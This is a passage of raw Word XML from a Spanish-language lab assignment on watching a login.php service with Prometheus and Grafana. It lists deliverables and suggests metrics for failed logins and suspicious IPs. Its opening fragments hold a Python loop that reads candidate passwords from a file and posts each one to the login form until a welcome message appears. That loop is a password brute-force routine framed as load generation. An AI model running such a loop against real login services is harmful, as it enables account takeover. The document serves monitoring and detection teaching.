        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for line in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1AE33" w14:textId="77F814D6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="009B691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43895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password = line.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA49E1E" w14:textId="145C7305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payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52923B" w14:textId="791C4C9C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="009B691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43895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"loginName": username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0B726" w14:textId="0B550B73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  "password": password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F2538" w14:textId="79827560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338384D9" w14:textId="684697C7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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C58D0" w14:textId="4108A150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="009B691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43895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>response = requests.post(url, data=payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC5CF5" w14:textId="59A44DA6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  if "Bienvenido" in response.text and response.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6E995" w14:textId="7A249B6B" w:rsidR="00943895" w:rsidRPr="00943895" w:rsidRDefault="00943895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="009B691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43895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(f"[SUCCESS] Password válida encontrada: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A43CA5" w14:textId="5892A4B5" w:rsidR="00943895" w:rsidRPr="00943895" w:rsidRDefault="009B691F" w:rsidP="0094389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43895" w:rsidRPr="00943895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB747A8" w14:textId="2ACC50CD" w:rsidR="00943895" w:rsidRPr="00943895" w:rsidRDefault="00943895" w:rsidP="00943895">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943895">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>      print(f"[ERROR] {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A710C5" w14:textId="77777777" w:rsidR="00FB287F" w:rsidRDefault="00FB287F" w:rsidP="00DA14E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2159C91E" w14:textId="7748A868" w:rsidR="00547A23" w:rsidRPr="00547A23" w:rsidRDefault="00547A23" w:rsidP="00547A23">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00547A23">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>on esta carga debería ser más sencillo obtener visualizaciones con variaciones significativas de las métricas utilizadas en el panel de control de Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D8C75" w14:textId="16F5C4F6" w:rsidR="00F5669C" w:rsidRDefault="00916DD0" w:rsidP="00D564D8">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc203361932"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entregables de la </w:t>
      </w:r>
      <w:r w:rsidR="00F5669C">
        <w:t>práctica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="02B9F2E7" w14:textId="0ED20DBB" w:rsidR="00C50D4B" w:rsidRPr="00C50D4B" w:rsidRDefault="00E16BF3" w:rsidP="00C50D4B">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Se debe entregar un documento que incluya capturas o evidencias de</w:t>
      </w:r>
      <w:r w:rsidR="00C50D4B" w:rsidRPr="00C50D4B">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4978B9BF" w14:textId="77777777" w:rsidR="002E1D6A" w:rsidRPr="002E1D6A" w:rsidRDefault="002E1D6A" w:rsidP="002E1D6A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">La interfaz de Grafana con al menos un </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dashboard funcional creado por el alumno</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AAAA1" w14:textId="77777777" w:rsidR="002E1D6A" w:rsidRPr="002E1D6A" w:rsidRDefault="002E1D6A" w:rsidP="002E1D6A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Paneles visibles que muestren al menos </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tres métricas distintas</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> relevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA4FA9" w14:textId="77777777" w:rsidR="002E1D6A" w:rsidRPr="002E1D6A" w:rsidRDefault="002E1D6A" w:rsidP="002E1D6A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1D6A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Captura del código Python que simula carga sobre el servicio login.php o resultados de su ejecución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56809478" w14:textId="70FF29F2" w:rsidR="00E24077" w:rsidRDefault="009653F3" w:rsidP="00C50D4B">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A diferencia de otras prácticas, aquí se valora especialmente la </w:t>
      </w:r>
      <w:r w:rsidRPr="009653F3">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>creatividad, la capacidad de exploración y el criterio técnico</w:t>
      </w:r>
      <w:r w:rsidRPr="009653F3">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> del estudiante a la hora de diseñar el dashboard. Se premiará la capacidad para ir más allá de los ejemplos y adaptar la visualización a lo que se desea monitorizar con claridad y utilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC5BE" w14:textId="1F81084D" w:rsidR="00E24077" w:rsidRDefault="00E24077" w:rsidP="00E24077">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc203361933"/>
      <w:r>
        <w:t>Continuará</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0763AECB" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Esta práctica es solo el primer paso. Una posible mejora para futuras versiones es instrumentar el servicio login.php con métricas personalizadas que Prometheus pueda recolectar y Grafana visualizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16354677" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Por ejemplo, podrías:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD025C" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Contar el número total de accesos a login.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB04B50" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Diferenciar entre intentos fallidos y exitosos de login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73452CC6" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Crear métricas para IP sospechosas o múltiples fallos consecutivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD3AD3A" w14:textId="1D09C999" w:rsidR="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t>Estas métricas se pueden exponer en /metrics.php y añadir como nuevas series en Prometheus, lo que permitiría crear paneles avanzados, alertas automáticas o análisis de comportamiento sospechoso.</w:t>
      </w:r>
      <w:r w:rsidR="00F2095D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4144993B" w14:textId="2068E98A" w:rsidR="00F2095D" w:rsidRDefault="00F2095D" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t>Como pista esto en PHP se puede hacer con librerías como</w:t>
      </w:r>
      <w:r w:rsidR="00AB7D6C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2CF8B" w14:textId="2A9F9B47" w:rsidR="00AB7D6C" w:rsidRPr="004E0B07" w:rsidRDefault="00AB7D6C" w:rsidP="004E0B0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0B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>composer require jimdo/prometheus_client_php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99CFF0" w14:textId="31A832C7" w:rsidR="00AB7D6C" w:rsidRDefault="00AB7D6C" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB7D6C">
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">onde estamos ya indicando </w:t>
      </w:r>
      <w:r w:rsidR="004E0B07">
        <w:t>que,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> como gestor de dependencias en PHP, al igual que pip en Python se recomienda usar </w:t>
      </w:r>
      <w:r w:rsidRPr="004E0B07">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Composer</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B84CA" w14:textId="015D4016" w:rsidR="004E0B07" w:rsidRDefault="004E0B07" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t>Un vídeo muy interesante a este respecto es, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC97E8C" w14:textId="0ABACCF2" w:rsidR="004E0B07" w:rsidRDefault="004E0B07" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="0079276E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=PCJwJpbln6Q</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3471D390" w14:textId="35B78D34" w:rsidR="009653F3" w:rsidRPr="008C5CC6" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009653F3">
        <w:t xml:space="preserve">¿Te atreves a dar el siguiente paso? </w:t>
      </w:r>
      <w:r w:rsidRPr="009653F3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>😉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0648D6" w14:textId="77777777" w:rsidR="009653F3" w:rsidRPr="009653F3" w:rsidRDefault="009653F3" w:rsidP="009653F3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pP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6B0C" w14:textId="77777777" w:rsidR="00ED736C" w:rsidRDefault="00ED736C" w:rsidP="00046FBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="299A912D" w14:textId="77777777" w:rsidR="00ED736C" w:rsidRDefault="00ED736C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1942A" w14:textId="77777777" w:rsidR="00ED736C" w:rsidRDefault="00ED736C" w:rsidP="00046FBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42342533" w14:textId="77777777" w:rsidR="00ED736C" w:rsidRDefault="00ED736C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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1205557196">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1827478551">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="649941251">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="216628692">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="56629504">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="396823217">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1451557876">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="477770913">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1382173643">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1503356169">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="430274444">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="778112446">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1284268020">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="804734696">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1464807867">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="3704909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18C9"/>
    <w:rsid w:val="00016FC1"/>
    <w:rsid w:val="00025CA6"/>
    <w:rsid w:val="000270BF"/>
    <w:rsid w:val="00030259"/>
    <w:rsid w:val="000332ED"/>
    <w:rsid w:val="00040E72"/>
    <w:rsid w:val="00046FBD"/>
    <w:rsid w:val="00047FA0"/>
    <w:rsid w:val="000525CE"/>
    <w:rsid w:val="0006173B"/>
    <w:rsid w:val="0006192F"/>
    <w:rsid w:val="00064C0C"/>
    <w:rsid w:val="0006633C"/>
    <w:rsid w:val="000713FD"/>
    <w:rsid w:val="00091660"/>
    <w:rsid w:val="00095F1B"/>
    <w:rsid w:val="00097EFB"/>
    <w:rsid w:val="000A2280"/>
    <w:rsid w:val="000A5C09"/>
    <w:rsid w:val="000B1711"/>
    <w:rsid w:val="000B28B6"/>
    <w:rsid w:val="000C242B"/>
    <w:rsid w:val="000C641B"/>
    <w:rsid w:val="000C74F5"/>
    <w:rsid w:val="000D5B39"/>
    <w:rsid w:val="000E155E"/>
    <w:rsid w:val="000F0D3E"/>
    <w:rsid w:val="00104B16"/>
    <w:rsid w:val="00117D9D"/>
    <w:rsid w:val="00131FBE"/>
    <w:rsid w:val="00131FF6"/>
    <w:rsid w:val="00136163"/>
    <w:rsid w:val="0014399E"/>
    <w:rsid w:val="001458A6"/>
    <w:rsid w:val="00146A3B"/>
    <w:rsid w:val="00160703"/>
    <w:rsid w:val="00163D34"/>
    <w:rsid w:val="001731DB"/>
    <w:rsid w:val="00182E86"/>
    <w:rsid w:val="001871BA"/>
    <w:rsid w:val="0019475F"/>
    <w:rsid w:val="00194852"/>
    <w:rsid w:val="001A041C"/>
    <w:rsid w:val="001B3489"/>
    <w:rsid w:val="001B5471"/>
    <w:rsid w:val="001B5C4A"/>
    <w:rsid w:val="001D7A10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616B4"/>
    <w:rsid w:val="00263D5F"/>
    <w:rsid w:val="0027325C"/>
    <w:rsid w:val="00292CF2"/>
    <w:rsid w:val="002A2FA7"/>
    <w:rsid w:val="002A51D4"/>
    <w:rsid w:val="002B5C45"/>
    <w:rsid w:val="002D074B"/>
    <w:rsid w:val="002D213D"/>
    <w:rsid w:val="002D4533"/>
    <w:rsid w:val="002E1D6A"/>
    <w:rsid w:val="002E4702"/>
    <w:rsid w:val="002F186A"/>
    <w:rsid w:val="00300ECD"/>
    <w:rsid w:val="00344E3E"/>
    <w:rsid w:val="003473D1"/>
    <w:rsid w:val="0035279F"/>
    <w:rsid w:val="0035497C"/>
    <w:rsid w:val="003666DD"/>
    <w:rsid w:val="00371372"/>
    <w:rsid w:val="00381120"/>
    <w:rsid w:val="003827B5"/>
    <w:rsid w:val="00384B2A"/>
    <w:rsid w:val="00385CE7"/>
    <w:rsid w:val="0039345A"/>
    <w:rsid w:val="003A1C0F"/>
    <w:rsid w:val="003B349E"/>
    <w:rsid w:val="003B3FB4"/>
    <w:rsid w:val="003D1246"/>
    <w:rsid w:val="003D344A"/>
    <w:rsid w:val="003E16B3"/>
    <w:rsid w:val="003E2D1E"/>
    <w:rsid w:val="003F5143"/>
    <w:rsid w:val="0042645A"/>
    <w:rsid w:val="0042749F"/>
    <w:rsid w:val="0043001A"/>
    <w:rsid w:val="004454EF"/>
    <w:rsid w:val="00451630"/>
    <w:rsid w:val="00454941"/>
    <w:rsid w:val="00464887"/>
    <w:rsid w:val="00466A46"/>
    <w:rsid w:val="00473E05"/>
    <w:rsid w:val="00475600"/>
    <w:rsid w:val="0049195C"/>
    <w:rsid w:val="004A2DA3"/>
    <w:rsid w:val="004B75FB"/>
    <w:rsid w:val="004C1BBB"/>
    <w:rsid w:val="004C342B"/>
    <w:rsid w:val="004C3BF5"/>
    <w:rsid w:val="004C4475"/>
    <w:rsid w:val="004D3472"/>
    <w:rsid w:val="004D6724"/>
    <w:rsid w:val="004D687D"/>
    <w:rsid w:val="004E0B07"/>
    <w:rsid w:val="004E2612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AC2"/>
    <w:rsid w:val="0054040F"/>
    <w:rsid w:val="005468D5"/>
    <w:rsid w:val="00547A23"/>
    <w:rsid w:val="00554B9E"/>
    <w:rsid w:val="00556D07"/>
    <w:rsid w:val="0056512C"/>
    <w:rsid w:val="005651A1"/>
    <w:rsid w:val="00576C7B"/>
    <w:rsid w:val="00581455"/>
    <w:rsid w:val="00587496"/>
    <w:rsid w:val="00595026"/>
    <w:rsid w:val="00595426"/>
    <w:rsid w:val="005A3F79"/>
    <w:rsid w:val="005B4C3B"/>
    <w:rsid w:val="005C02C0"/>
    <w:rsid w:val="005C4A1A"/>
    <w:rsid w:val="005C5101"/>
    <w:rsid w:val="005E095E"/>
    <w:rsid w:val="005F05D2"/>
    <w:rsid w:val="005F0EFF"/>
    <w:rsid w:val="005F7FEA"/>
    <w:rsid w:val="00600509"/>
    <w:rsid w:val="0060079C"/>
    <w:rsid w:val="00601431"/>
    <w:rsid w:val="006118CF"/>
    <w:rsid w:val="00616C04"/>
    <w:rsid w:val="00632581"/>
    <w:rsid w:val="006334CE"/>
    <w:rsid w:val="00634398"/>
    <w:rsid w:val="006374E5"/>
    <w:rsid w:val="00642011"/>
    <w:rsid w:val="00655ACE"/>
    <w:rsid w:val="00670065"/>
    <w:rsid w:val="006706CC"/>
    <w:rsid w:val="006A52EA"/>
    <w:rsid w:val="006A6E35"/>
    <w:rsid w:val="006B76C6"/>
    <w:rsid w:val="006C1E5E"/>
    <w:rsid w:val="006D1960"/>
    <w:rsid w:val="006F1D3F"/>
    <w:rsid w:val="006F2216"/>
    <w:rsid w:val="006F54D0"/>
    <w:rsid w:val="00711F48"/>
    <w:rsid w:val="00712063"/>
    <w:rsid w:val="007273A7"/>
    <w:rsid w:val="00743019"/>
    <w:rsid w:val="00751690"/>
    <w:rsid w:val="007527FB"/>
    <w:rsid w:val="00766D77"/>
    <w:rsid w:val="00773D72"/>
    <w:rsid w:val="00783707"/>
    <w:rsid w:val="00783760"/>
    <w:rsid w:val="007B3FA7"/>
    <w:rsid w:val="007C28FE"/>
    <w:rsid w:val="007C2CA1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3443B"/>
    <w:rsid w:val="00847775"/>
    <w:rsid w:val="0085404C"/>
    <w:rsid w:val="008710A6"/>
    <w:rsid w:val="00874E40"/>
    <w:rsid w:val="00875BA3"/>
    <w:rsid w:val="008805E7"/>
    <w:rsid w:val="00893540"/>
    <w:rsid w:val="0089523E"/>
    <w:rsid w:val="008B30A4"/>
    <w:rsid w:val="008C5CC6"/>
    <w:rsid w:val="008D6FC3"/>
    <w:rsid w:val="008E5471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3895"/>
    <w:rsid w:val="009439AB"/>
    <w:rsid w:val="00945E43"/>
    <w:rsid w:val="009609A5"/>
    <w:rsid w:val="009653F3"/>
    <w:rsid w:val="00974821"/>
    <w:rsid w:val="00974BFF"/>
    <w:rsid w:val="009833AA"/>
    <w:rsid w:val="009841AF"/>
    <w:rsid w:val="00993D8B"/>
    <w:rsid w:val="009A0A3D"/>
    <w:rsid w:val="009B5188"/>
    <w:rsid w:val="009B691F"/>
    <w:rsid w:val="009C3748"/>
    <w:rsid w:val="009D2E84"/>
    <w:rsid w:val="009D52D2"/>
    <w:rsid w:val="009D5A7D"/>
    <w:rsid w:val="009E56DA"/>
    <w:rsid w:val="009E5A04"/>
    <w:rsid w:val="00A00709"/>
    <w:rsid w:val="00A07D1D"/>
    <w:rsid w:val="00A11E7B"/>
    <w:rsid w:val="00A13F4B"/>
    <w:rsid w:val="00A26A63"/>
    <w:rsid w:val="00A36E65"/>
    <w:rsid w:val="00A51E02"/>
    <w:rsid w:val="00A52674"/>
    <w:rsid w:val="00A54BF4"/>
    <w:rsid w:val="00A601D9"/>
    <w:rsid w:val="00A64B17"/>
    <w:rsid w:val="00A64D2B"/>
    <w:rsid w:val="00A67722"/>
    <w:rsid w:val="00A84ED7"/>
    <w:rsid w:val="00A93547"/>
    <w:rsid w:val="00AA173A"/>
    <w:rsid w:val="00AB7D6C"/>
    <w:rsid w:val="00AC5C9F"/>
    <w:rsid w:val="00AD135C"/>
    <w:rsid w:val="00AD1D72"/>
    <w:rsid w:val="00AD38B0"/>
    <w:rsid w:val="00AD3DD8"/>
    <w:rsid w:val="00B06515"/>
    <w:rsid w:val="00B07605"/>
    <w:rsid w:val="00B207F8"/>
    <w:rsid w:val="00B210A2"/>
    <w:rsid w:val="00B26B66"/>
    <w:rsid w:val="00B34F8D"/>
    <w:rsid w:val="00B4652F"/>
    <w:rsid w:val="00B47A35"/>
    <w:rsid w:val="00B620EC"/>
    <w:rsid w:val="00B626F2"/>
    <w:rsid w:val="00B64DB0"/>
    <w:rsid w:val="00B82389"/>
    <w:rsid w:val="00B84EDE"/>
    <w:rsid w:val="00B97C35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55B7"/>
    <w:rsid w:val="00C065FA"/>
    <w:rsid w:val="00C12B69"/>
    <w:rsid w:val="00C13AAD"/>
    <w:rsid w:val="00C24476"/>
    <w:rsid w:val="00C34106"/>
    <w:rsid w:val="00C50D4B"/>
    <w:rsid w:val="00C51A5B"/>
    <w:rsid w:val="00C61991"/>
    <w:rsid w:val="00C630EC"/>
    <w:rsid w:val="00C837B0"/>
    <w:rsid w:val="00C86F45"/>
    <w:rsid w:val="00C90EF8"/>
    <w:rsid w:val="00C91D6D"/>
    <w:rsid w:val="00C9525E"/>
    <w:rsid w:val="00CA4B46"/>
    <w:rsid w:val="00CA6162"/>
    <w:rsid w:val="00CB5B97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517F6"/>
    <w:rsid w:val="00D53581"/>
    <w:rsid w:val="00D56010"/>
    <w:rsid w:val="00D564D8"/>
    <w:rsid w:val="00D65039"/>
    <w:rsid w:val="00D75DA7"/>
    <w:rsid w:val="00D764CE"/>
    <w:rsid w:val="00D77023"/>
    <w:rsid w:val="00D83246"/>
    <w:rsid w:val="00D92324"/>
    <w:rsid w:val="00D96C9B"/>
    <w:rsid w:val="00DA14E9"/>
    <w:rsid w:val="00DA44DA"/>
    <w:rsid w:val="00DA6C19"/>
    <w:rsid w:val="00DC223F"/>
    <w:rsid w:val="00DC58AC"/>
    <w:rsid w:val="00DE1FAF"/>
    <w:rsid w:val="00DE49E8"/>
    <w:rsid w:val="00DF2254"/>
    <w:rsid w:val="00DF3F47"/>
    <w:rsid w:val="00DF465E"/>
    <w:rsid w:val="00DF5DC4"/>
    <w:rsid w:val="00E026B7"/>
    <w:rsid w:val="00E16BF3"/>
    <w:rsid w:val="00E173C4"/>
    <w:rsid w:val="00E24077"/>
    <w:rsid w:val="00E25C3B"/>
    <w:rsid w:val="00E267C6"/>
    <w:rsid w:val="00E302F2"/>
    <w:rsid w:val="00E35A65"/>
    <w:rsid w:val="00E411FE"/>
    <w:rsid w:val="00E43326"/>
    <w:rsid w:val="00E44EBC"/>
    <w:rsid w:val="00E54476"/>
    <w:rsid w:val="00E546B1"/>
    <w:rsid w:val="00E54747"/>
    <w:rsid w:val="00E6547E"/>
    <w:rsid w:val="00E67FBF"/>
    <w:rsid w:val="00E855A2"/>
